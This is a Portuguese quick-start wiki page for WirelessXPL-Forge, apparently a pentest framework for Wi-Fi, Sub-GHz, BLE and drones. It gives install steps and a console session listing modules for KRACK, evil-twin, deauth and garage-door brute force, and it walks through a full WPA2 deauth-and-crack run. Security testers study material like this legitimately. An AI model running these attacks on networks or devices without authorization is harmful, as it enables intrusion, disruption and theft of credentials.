-
Notifications
You must be signed in to change notification settings - Fork 2
Inicio Rapido
André Henrique edited this page Jun 8, 2026
·
1 revision
Idioma: Português (pt-BR) | English: Quick-Start
- Python 3.8 ou superior (testado em 3.8-3.13)
- Linux recomendado (Kali, Parrot, Ubuntu); macOS suportado; Windows via WSL2
- Adaptador wireless com suporte a modo monitor para captura ao vivo
pip install wirelessxplCom extras opcionais:
# Suporte serial para orquestração Bruce / ESP32
pip install "wirelessxpl[serial]"
# Classificação de sinal via ML (experimental)
pip install "wirelessxpl[ml-lite]"git clone https://github.com/mrhenrike/WirelessXPL-Forge.git
cd WirelessXPL-Forge
pip install -r requirements.txt
python wxf.pyMétodos alternativos de execução:
python -m wirelessxpl
# ou (após pip install -e .)
wxfsudo apt install aircrack-ng hcxtools hcxdumptool mdk4 hostapd dnsmasq tshark
pip install wirelessxpl| Cenário | Hardware Necessário | Notas |
|---|---|---|
| Monitor/captura WiFi | Alfa AWUS036ACM ou qualquer adaptador com modo monitor | Suportado via aircrack-ng/scapy |
| Sub-GHz TX/RX | HackRF One | Replay, força bruta, interferência |
| Sub-GHz somente RX | RTL-SDR | Decodificação passiva (TPMS, análise de sinal) |
| Sub-GHz econômico TX/RX | CC1101 + ESP32 | Ataques de código estático 300-928 MHz |
| Sub-GHz Flipper | Flipper Zero / firmware Bruce | Replay de arquivos .sub |
| Testes com drones | Adaptador WiFi + acesso à rede | DJI/Parrot via WiFi |
| Testes MAVLink | Acesso à rede UDP/TCP | ArduPilot/PX4 na UDP 14550 |
| Ataques BLE | Adaptador USB Bluetooth 4.0+ | BlueZ no Linux |
| BLE avançado | Dongle nRF52840 (Sniffle) | Sniffing BLE |
| Fluxos ESP32 | Placa ESP32 com Bruce/Marauder | Conexão serial USB |
| Marítimo | RTL-SDR ou HackRF | AIS/NMEA passivo ou ativo |
$ python wxf.py
__ __ _ _ __ ____ __
\ \ / / (_) | | /_ |/ __ |\ \
\ \ /\ / / _ __| | ___ ___ | || | | |\ \
\ \/ \/ / | | / _` | / _ \/ __| | || | | | > >
\ /\ / | || (_| || __/\__ \ | || |__| |/ /
\/ \/ |_| \__,_| \___||___/ |_| \____//_/
WirelessXPL-Forge v1.8.0 | BSD-3-Clause
Author: Andre Henrique (@mrhenrike) | Uniao Geek
Modules: 329+ | Python 3.8-3.13
wxf >
wxf > help
Core Commands:
use <module> Carregar um módulo
show modules Listar todos os módulos disponíveis
show options Exibir opções do módulo atual
set <OPT> <value> Definir valor de uma opção
unset <OPT> Restaurar opção ao padrão
check Verificar se o alvo é vulnerável
run Executar o módulo carregado
back Descarregar o módulo atual
search <keyword> Buscar módulos por palavra-chave
info Exibir informações detalhadas do módulo
sessions Listar sessões ativas
exit Sair do framework
wxf > search wifi
[*] Searching for 'wifi' in module names and descriptions...
generic/wifi_lab/handshake_snooper PMKID-first + deauth handshake capture pipeline
generic/wifi_lab/wpa3_attack_suite Dragonblood SAE flood, CSA+harvest, Double SSID, downgrade
generic/wifi_lab/fragattacks FragAttacks (CVE-2020-26140+)
generic/wifi_lab/krack_attack KRACK WPA2 4-way replay
generic/wifi_lab/evil_twin_workflow Full evil-twin with verify-on-capture
generic/wifi_lab/wpa_brute WPA/WPA2 offline brute-force
generic/wids/wifi_ids Wireless Intrusion Detection System
generic/wardrive/wardrive_logger GPS-tagged WiFi discovery logger
...
wxf > search device=subghz
generic/subghz/static_code_replay EV1527/Princeton/CAME/NICE static code replay
generic/subghz/debruijn_bruteforce DeBruijn sequence bruteforce for garage doors
generic/subghz/keeloq_decoder KeeLoq rolling code frame decoder
generic/subghz/keeloq_replay KeeLoq rolling code replay
generic/subghz/tpms/tpms_decoder TPMS tire pressure sensor passive decoder
...
wxf > use generic/wifi_lab/wpa_brute
wxf (WPABrute) > show options
Options:
TARGET_BSSID (required) Target AP MAC address (AA:BB:CC:DD:EE:FF)
INTERFACE wlan0mon Monitor mode interface
WORDLIST (required) Path to wordlist file
SIMULATE false Dry-run without transmitting
wxf (WPABrute) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (WPABrute) > set INTERFACE wlan0mon
wxf (WPABrute) > set WORDLIST /usr/share/wordlists/rockyou.txt
wxf (WPABrute) > check
[*] Checking target AA:BB:CC:DD:EE:FF...
[+] Target is reachable on channel 6
[+] Security: WPA2-PSK
[+] PMKID available: yes
[*] Target is vulnerable to PMKID clientless attack
wxf (WPABrute) > run
[*] Starting WPA2 brute force against AA:BB:CC:DD:EE:FF
[*] Interface: wlan0mon | Wordlist: 14,344,391 words
[*] Attempting PMKID capture first (clientless)...
[+] PMKID captured: 4d4f4e4f3a3a3a3a...
[*] Falling back to 4-way handshake capture...
[*] Sending deauth frames to force reconnect...
[+] Handshake captured (4-way EAPOL)
[*] Testing passwords...
[*] Progress: 125,432/14,344,391 (0.87%) - 2,841/s
[+] PASSWORD FOUND: mypassword123
[+] Network: HomeWifi | Security: WPA2-PSK
[+] Evidence written to session log
wxf (WPABrute) > back
wxf > use generic/wids/wifi_ids
wxf (WirelessIDS) > set INTERFACE wlan0mon
wxf (WirelessIDS) > run
# Execução de módulo único com opções
python wxf.py -m generic/wifi_lab/handshake_snooper \
INTERFACE=wlan0mon TARGET_BSSID=AA:BB:CC:DD:EE:FF
# Enviar comandos a partir de arquivo
python wxf.py < commands.txtApós a instalação, verifique se todas as ferramentas necessárias estão disponíveis:
wxf > use generic/external/wireless_tool_prereq_audit
wxf (PrereqAudit) > run
[*] Checking system tool dependencies...
[+] aircrack-ng : found (/usr/bin/aircrack-ng) v1.7
[+] hcxdumptool : found (/usr/bin/hcxdumptool) v6.2.7
[+] hashcat : found (/usr/bin/hashcat) v6.2.6
[+] tshark : found (/usr/bin/tshark) v4.2.0
[!] hackrf_transfer : NOT FOUND - required for Sub-GHz TX
[!] mdk4 : NOT FOUND - optional (beacon flood, deauth storm)
[*] Core tools: OK | Optional tools: 2 missing
Próximo: Referência CLI | Ataques Wi-Fi | Ataques Sub-GHz
Autor: André Henrique (@mrhenrike) | União Geek
Primeiros Passos
Ataques Wireless
Drones e UAV
Protocolos Especializados
Ferramentas de Pentest
Hardware